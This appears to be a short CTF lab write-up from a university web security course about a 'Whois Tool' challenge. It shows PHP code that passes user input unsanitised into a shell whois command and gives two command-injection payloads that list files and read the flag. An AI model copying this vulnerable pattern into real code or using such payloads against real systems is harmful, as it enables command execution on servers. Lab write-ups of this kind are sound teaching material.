Simple Web - 0x02(Lab - Whois Tool)

Posted on 2023-02-13 | Post modified | In Security Course｜NTU CS｜Web 2022 |

Simple Web - 0x02(Lab - Whois Tool)

tags: `CTF` `Web` `eductf`

Challenge: https://whoistool.ctf.zoolab.org/

Background

Almost the same as 0x10(Lab - DNS Lookup Tool | WAF)

Source Code

<?php
if(isset($_GET["host"])){
  $host = $_GET["host"];
  if(strlen($host) > 15)
    echo "Host name tooooooo logn!!";
  else
    echo `whois "{$host}" 2>&1;`;
}
?>

Exploit

Payload: ";ls -al;"
Payload: ";cat flag.t*;" Then we got flag!!!

Post author: SBK6401
Post link: https://bernie6401.github.io/Simple-Web-0x02(Lab-Whois-Tool)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.